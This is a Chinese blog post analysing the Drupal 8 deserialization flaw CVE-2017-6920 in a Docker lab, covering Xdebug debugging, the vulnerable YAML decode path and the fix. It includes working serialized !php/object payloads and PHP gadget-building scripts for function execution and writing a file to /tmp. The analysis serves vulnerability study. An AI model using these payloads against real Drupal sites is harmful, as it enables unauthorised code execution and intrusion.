「漏洞分析」Drupal 远程代码执行「CVE-2017-6920」

于 2022-07-13 17:35:40 发布
阅读量321 收藏 2
点赞数 2
文章标签: 信息安全 java linux python php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38154820/article/details/125775977
版权

前几天在参加 FOFA-攻防挑战赛时,遇到了 Drupal 的盲盒漏洞环境,最终确定漏洞为 CVE-2017-6920 ,但是还是无法 getflag ,因为网上相关参考文章并不是很多,大多都只是简单的复现了,于是就想着对这个漏洞进行一个详细的分析。

漏洞描述

5a85caa19acd78c571b9b20192a26b13.png

环境搭建

环境的搭建,我们可以选择 p神 的 Vulhub 上的环境,我们也可以利用 vulfocus 的在线环境,或者将镜像拉取下来本地启动。

因为 p 神的环境还需要再进行配置 yaml ,为了方便,我们这里就选择 vulfocus 的镜像来进行复现学习

e5c4e73cd74b58233d2f9a91c403d0e6.png

docker pull vulfocus/drupal-cve_2017_6920:latest
docker ps

b62662ae0e6c9ca62e8befb792c991a2.png

访问随机生成的端口 49156  http://127.0.0.1:49156/

fd6bcd31d20334318762e32c9cc501c5.png

漏洞复现

访问登录界面 http://127.0.0.1:49156/user/login

7f8e35b4f86b9fe92d59ae3421809fe9.png


输入账号密码  admin:admin123

登录成功

ee6c1838314df80a571d641a9b18ed37.png

登陆成功后访问路由 /admin/config/development/configuration/single/import

8ec7de6169dd5c496a6080d5a9232b2e.png


填写相关参数

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

a4423bd99c6e43056e8ca1f1fce61462.png


点击 import 触发漏洞

0e1865ef5c9f02a011897b760cae48e8.png

漏洞分析

漏洞存在于 drupal 8.3.3 所以我们下载 存在漏洞的版本 drupal 8.3.3 和修复的版本 drupal 8.3.4 进行对比,发现漏洞位于

core\lib\Drupal\Component\Serialization\YamlPecl.php

9e02ed431a68d5c845dae28c314b3a90.png


我们看到修改的位置有这么一句 // We never want to unserialize !php/object.

就大概可以推测出是在这个地方,以!php/object 为开头时 会产生反序列化漏洞

为了方便进行调试,所以我们换一下 docker 启动时的命令,方便启动后进行 php 远程调试,在配置调试环境时出现了各种问题,本来是在本地搭建 docker 环境进行调试的,但是一直没有成功,所以就采用在虚拟机中搭建 docker 环境,采用远程调试。

docker run -itd -p 80:80  vulfocus/drupal-cve_2017_6920:latest

wget https://xdebug.org/files/xdebug-2.5.5.tgz

docker cp xdebug-2.5.5.tgz  30:/xdebug-2.5.5.tgz

docker exec -it 30 /bin/bash

cd /

tar xvf xdebug-2.5.5.tgz

cd xdebug-2.5.5

phpize

find / -name php-config

/etc/alternatives/php-config
/usr/bin/php-config
/var/lib/dpkg/alternatives/php-config

./configure --enable-xdebug --with-php-config=/usr/bin/php-config

make && make install  ==xdebug 被安装到了 /usr/lib/php5/20121212/==

find / -name php.ini

/etc/php5/cli/php.ini
/etc/php5/apache2/php.ini

vim  /etc/php5/apache2/php.ini  ==修改 php.ini 文件==

shift + g   ==定位到最后一行==

echo "<?php phpinfo(); ?>" > /var/www/html/phpinfo.php

sudo service apache2 restart

修改php.ini配置文件,在文件中追加以下内容

[Xdebug]
zend_extension=/usr/lib/php5/20121212/xdebug.so;指定Xdebug扩展文件的路径
xdebug.remote_enable=1 ;是否开启远程调试
xdebug.remote_handler=dbgp ;指定远程调试的处理协议
xdebug.remote_mode=req ;可以设为req或jit,req表示脚本一开始运行就连接远程客户端,jit表示脚本出错时才连接远程客户端。
xdebug.remote_host=192.168.222.1 ;指定远程调试的主机名(安装phpstorm的主机ip)
xdebug.remote_port=9001 ;指定远程调试的端口号
xdebug.idekey="PHPSTORM" ;指定传递给DBGp调试器处理程序的IDE Key
xdebug.remote_enable=on; 



[Xdebug]
zend_extension=/usr/lib/php5/20121212/xdebug.so;
xdebug.remote_enable=1;
xdebug.remote_handler=dbgp;
xdebug.remote_mode=req;
xdebug.remote_host=192.168.222.1;
xdebug.remote_port=9001;
xdebug.idekey="PHPSTORM";

访问  http://192.168.222.129/phpinfo.php  发现 xdebug 被安装成功

9b457f7ea39a949833ed1c6b52527f93.png

先将代码拷贝出来 docker cp 30:/var/www/html html

利用 PHPSTROM 打开项目代码

File -> Settings ->  Languages & Frameworks -> PHP -> Debug

cc54685f525e836aece401f1c071cbe7.png

e0f55ce9e0c09ea09f4a60cbe072c610.png


配置 Servers

8095c4e85d72d21b1571606434b9b572.png

此处要注意,需要直接指定到网站的目录位置

配置PHP Web Application

17ba654f30609365531188f67f0449a3.png

配置完成后打开右上角的电话按钮

446dec49fdce1b8cd451cb88bd6c7fbd.png

打开浏览器的插件 Xdebug helper

55bc09bf01a156635a231dc1bd301011.png

在 phpinfo 处加载断点,并访问 http://192.168.222.129/phpinfo.php成功加载到断点

2d4ab004973189df2a8d1a87499d96c3.png

之前也配置过 PHP 的远程调试环境,但是在 Docker 里面调试的时候,配置了很久的调试环境,最后才成功,中间出了大大小小无数的问题,遇到的最大的问题是最开始端口一直显示被占用状态,因为我启动 docker 时的命令是 docker run -itd -p 80:80 -p 9001:9001 vulfocus/drupal-cve_2017_6920:latest 我一直认为说这个 9001 端口也要对外映射出来,但是我在调试时发现一直提示端口被占用,百思不得其解,采用百度大法看到了这么一句 不要在docker-compose 中添加 9000 端口 ,我灵机一动,将 -p 9001:9001 给删除掉,就成功了。这下我才完全理解了,原来这个端口是远程调控,就是安装 PHPSTORM 机器上的端口。

正式开始调试分析

漏洞的最终触发位置是在

core/lib/Drupal/Component/Serialization/YamlPecl.php::decode

a853b204de3a7b9cc1a8c1520b016414.png

对传入的 参数 $raw 如果可控的话,如果使用!php/object,那么yaml_parse将会以反序列化(unserialize)的形式来进行处理字符串。

98e7b59e0c874fc84469989c70ef6133.png

我们看在哪里可以调用 YamlPecl.php::decode

core/lib/Drupal/Component/Serialization/Yaml.php::decode

792a8cd12cb0e3a036f71512fb9c5849.png

decode 函数中 调用了静态 getSerializer 函数

e134ba546b0edd1629518b94b8e8a004.png

如果存在 yaml 扩展,$serializer 就使用 YamlPecl 类,之后会调用 YamlPecl 类中的 decode 函数;

如果不存在 yaml 扩展,$serializer 就使用 YamlSymfony 类,之后会调用 YamlSymfony 类中的 decode 函数。目前的环境是已经安装了 yaml 扩展了,所以我们只需要寻找,可控输入的 Yaml::decode

core/modules/config/src/Form/ConfigSingleImportForm.php::validateForm

634efd32e11f15b2d53e1e9f588e1c9d.png

如此我们就已经确定了漏洞的触发位置,以及漏洞的入口点,但是距离漏洞的利用成功还差一个 payload

我们已经知道这个漏洞是一个反序列化漏洞,我们就要找出这个系统中存在的反序列化链,针对这个漏洞有两条利用链路,任意命令执行以及任意文件写入

任意命令执行

html\vendor\guzzlehttp\psr7\src\FnStream.php

313b8a4eb792d9a3a9be80d83c76a343.png


反序列化这个类造成任意无参数函数执行

<?php
namespace GuzzleHttp\Psr7;
class FnStream {
  public function __construct(array $methods)
  {
    $this->methods = $methods;


    // Create the functions on the class
    foreach ($methods as $name => $fn) {
      $this->{'_fn_' . $name} = $fn;
    }
  }
  public function __destruct()
  {
    if (isset($this->_fn_close)) {
      call_user_func($this->_fn_close);
    }
  }
}
$fn = new FnStream(array('close'=>'phpinfo'));
echo(serialize($fn))
?>

ed1f3c1c79299cd4e1c8c20d2ebc51b0.png


序列化字符串加上yaml的!php/object

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:7:\"methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

ff51a3c02c0b6b42922e574cadd36479.png

6cf9e34faff47597414056ace4d244c9.png


任意文件写入

html\vendor\guzzlehttp\guzzle\src\Cookie\FileCookieJar.php

09393d0dd65d962fd66b73b89aad5d03.png


反序列化这个类达到任意文件写入的效果,但是因为这个系统启动并不是 root 权限启动,所以只有在 tmp 目录下写文件的权限

<?php

require __DIR__.'/vendor/autoload.php';


use GuzzleHttp\Cookie\FileCookieJar;
use GuzzleHttp\Cookie\SetCookie;


$Limerence = new FileCookieJar('/tmp/shell.txt');
$payload = '1';
$data=array(
    'Name' => "Limerence",
    'Value' => "Limerence",
    'Domain' => $payload,
    'Expires' => time()
);
$Limerence->setCookie(new SetCookie($data));
echo(addslashes(serialize($Limerence)));

c2c8b363ab7975ef14277010bd4ae5e2.png


!php/object "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":4:{s:41:\"\0GuzzleHttp\\Cookie\\FileCookieJar\0filename\";s:14:\"/tmp/shell.txt\";s:52:\"\0GuzzleHttp\\Cookie\\FileCookieJar\0storeSessionCookies\";b:0;s:36:\"\0GuzzleHttp\\Cookie\\CookieJar\0cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"\0GuzzleHttp\\Cookie\\SetCookie\0data\";a:9:{s:4:\"Name\";s:9:\"Limerence\";s:5:\"Value\";s:9:\"Limerence\";s:6:\"Domain\";s:1:\"1\";s:4:\"Path\";s:1:\"/\";s:7:\"Max-Age\";N;s:7:\"Expires\";i:1657262153;s:6:\"Secure\";b:0;s:7:\"Discard\";b:0;s:8:\"HttpOnly\";b:0;}}}s:39:\"\0GuzzleHttp\\Cookie\\CookieJar\0strictMode\";N;}"

7e9fa4e9eaffeef5206ed56681bda9fb.png

漏洞修复

根据对比官方对 drupal 8.3.4 的修补,我们得出 针对低于版本 drupal 8.3.4 的代码中 在 core\lib\Drupal\Component\Serialization\YamlPecl.phpdecode 函数修改为

public static function decode($raw) {
    static $init;
    if (!isset($init)) {
      ini_set('yaml.decode_php', 0);
      $init = TRUE;
    }
    if (!trim($raw)) {
      return NULL;
    }
    set_error_handler([__CLASS__, 'errorHandler']);
    $ndocs = 0;
    $data = yaml_parse($raw, 0, $ndocs, [
      YAML_BOOL_TAG => '\Drupal\Component\Serialization\YamlPecl::applyBooleanCallbacks',
    ]);
    restore_error_handler();
    return $data;
  }

总结反思

之前也实现过远程调试,但是对 docker 内的系统进行调试还没有做过,不对的试错过程中,也对 docker 进一步加深的认知与了解。

fe0dfc0c8eeffa91d7966709869738b5.jpeg

原创稿件征集

征集原创技术文章中,欢迎投递

投稿邮箱:edu@antvsion.com

文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关

通过审核并发布能收获200-800元不等的稿酬。

更多详情,点我查看!

7cd7cdd6351a87a73caabf8865eba512.gif

靶场实操,戳“阅读原文"

蚁景网安实验室
关注
博客
深度学习后门攻击分析与实现(一)
09-19 636
在计算机安全中,后门攻击是一种恶意软件攻击方式,攻击者通过在系统、应用程序或设备中植入未经授权的访问点,从而绕过正常的身份验证机制,获得对系统的隐蔽访问权限。这种“后门”允许攻击者在不被检测的情况下进入系统,执行各种恶意活动。
博客
Apache OFBiz远程代码执行漏洞(CVE-2024-38856)
09-12 298
Apache OFBiz 是一个开源的企业资源规划系统,提供了一整套企业管理解决方案。Apache OFBiz 在处理 view 视图渲染的时候存在逻辑缺陷,未经身份验证的攻击者可通过构造特殊 URL 来覆盖最终的渲染视图,从而执行任意代码。
博客
如何通过组合手段大批量探测CVE-2024-38077
09-10 1023
近期正值多事之秋,hvv中有CVE-2024-38077专项漏洞演习,上级police也需要检查辖区内存在漏洞的资产,自己单位领导也收到了情报,在三方共振下这个大活儿落到了我的头上。Windows Server RDL的这个漏洞原理就不过多介绍,本文重点关注如何满足大批量探测的需求。
博客
靶场战神为何会陨落?
09-04 1216
我从第一个SQL注入漏洞原理学起,从sql-libas到DVWA,到pikachu再到breach系列,DC系列靶场,再到实战挖洞,发现靶场与实战的区别是极其大的。本文将以DC系列靶场为例子,分析靶场与实战的区别,同时分享实战思路与需要用到的一些工具插件。
博客
大模型隐私泄露攻击技巧分析与复现
09-02 1110
大型语言模型,尤其是像ChatGPT这样的模型,尽管在自然语言处理领域展现了强大的能力,但也伴随着隐私泄露的潜在风险。在模型的训练过程中,可能会接触到大量的用户数据,其中包括敏感的个人信息,进而带来隐私泄露的可能性。
博客
记某项目的二顾茅庐5K实战
08-27 375
本文记录了针对某项目多个漏洞的挖掘过程。漏洞一:存在逻辑缺陷导致无限发布新动态和可修改动态问题;漏洞二:存在突破发布数量限制的问题;漏洞三:查询处因设计缺陷存在拒绝服务攻击漏洞。总结的挖掘思路:突破限制,反其道而行之。
博客
利用子域的System权限通往父域
08-23 435
最近翻阅笔记发现一篇文章提到通过子域的System权限可以突破获取到父域权限,本文将对此技术进行尝试复现研究。
博客
LLVM IR 深入研究分析
08-20 962
LLVM是C++编写的构架编译器的框架系统,可用于优化以任意程序语言编写的程序。LLVM IR可以理解为LLVM平台的汇编语言,所以官方也是以语言参考手册(Language Reference Manual)的形式给出LLVM IR的文档说明。
博客
MFC框架软件逆向研究
08-14 663
MFC库是开发Windows应用程序的C++接口。MFC提供了面向对象的框架,采用面向对象技术,将大部分的Windows API 封装到C++类中,以类成员函数的形式提供给程序开发人员调用。
博客
游戏安全入门-扫雷分析&远程线程注入
08-13 948
无论学习什么,首先,我们应该有个目标,那么入门windows游戏安全,脑海中浮现出来的一个游戏 -- 扫雷,一款家喻户晓的游戏,虽然已经被大家分析的不能再透了,但是我觉得自己去分析一下还是极好的,把它作为一个小目标再好不过了。
博客
【总结】注册码泄露原理以及例题
08-09 285
该题目采用了SIMD指令集,该指令格式在CTF和攻防对抗中经常出现,可以提高执行效率的同时也可以增加逆向的难度。对于此类指令和题目,我们分析的方法是:遇到查意思,查的多了就跟看正常代码一样,采用动态分析。
博客
jwt伪造身份组组组合拳艰难通关
08-08 719
现在的攻防演练不再像以往那样一个漏洞直捣黄龙,而是需要各种组合拳才能信手拈来,但是有时候使尽浑身解数也不能称心如意。
博客
【实战】文件加密器进行逆向
08-07 399
实战可以大大提高自己,学习技术的目的就是能够在实战中运用。本次实战与实际息息相关,该软件具有加密某文件的功能。
博客
后门函数技术在二进制对抗中的应用
07-26 954
本次题目跟第七届HWS线下的re2有类似的地方,均有后门函数。二进制后门可以理解为:我们只需要修改某个字节或某个函数,就可以将加密的过程变成解密的过程,大大节省逆向成本。本题先对内置的dll进行解密,然后调用其加密函数对我们的txt进行加密,如果我们将加密的函数nop为解密函数,就可以直接解密,类比与RC4动态解密技术。
博客
某个OA系统的代码审计
07-23 554
2023年HVV中爆出来的洞了,但是有一些漏洞点修复了,刚好地市级的攻防演练中遇到了一个,想着把可能出现问题的点全部审计一下,顺便熟悉一下.net代码审计。ps:感兴趣的师傅们可以自行根据poc搜索源码。
博客
JMX 反序列化漏洞
07-18 881
前段时间看到普元 EOS Platform 爆了这个洞,Apache James,Kafka-UI 都爆了这几个洞,所以决定系统来学习一下这个漏洞点。JMX(Java Management Extensions,即 Java 管理扩展)是一个为应用程序、设备、系统等植入管理功能的框架。
博客
【总结】逻辑运算在Z3中运用+CTF习题
07-17 900
国际赛IrisCTF在前几天举办,遇到了一道有意思的题目,特来总结。题目并不是很难,没有复杂的ollvm混淆也没有复杂的加密,但是却一步一步引导我们去学习和总结。
博客
一道关于逆向的实战CTF题目分析
07-12 1207
本题自带call型花指令,考验选手对花指令的理解程度。加密属于基础的异或和左右移位加密。主要考察选手的基础能力,动态调试和写脚本的能力。在这篇文章,详细记录了我的分析过程,相信你会有很大收获。
博客
双一流高校某教学系统存在多个高危漏洞
07-11 838
信息搜集过程中,除了用常见子域名扫一遍,还可以通过空间搜索引擎手动搜索。我用的就是把学校名称或者缩写作为关键字,利用一系列语法进行挨个查看。进行信息搜索(你得有一套自己的信息搜集逻辑吧,不然连这个系统都找不到)后,找到一处教学管理系统,点击页面上方软件,点击蓝色链接,进入教学系统。
博客
Windows远程桌面的奇技淫巧
07-09 689
远程桌面协议(RDP)是一个多通道(multi-channel)的协议,让使用者连上提供微软终端机服务的计算机(称为服务端或远程计算机)。在获取权限后,针对3389进行展开,先查询3389端口是否开启,发现没有开启(也有可能更改了端口),则可以通过注册表进行手动启动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值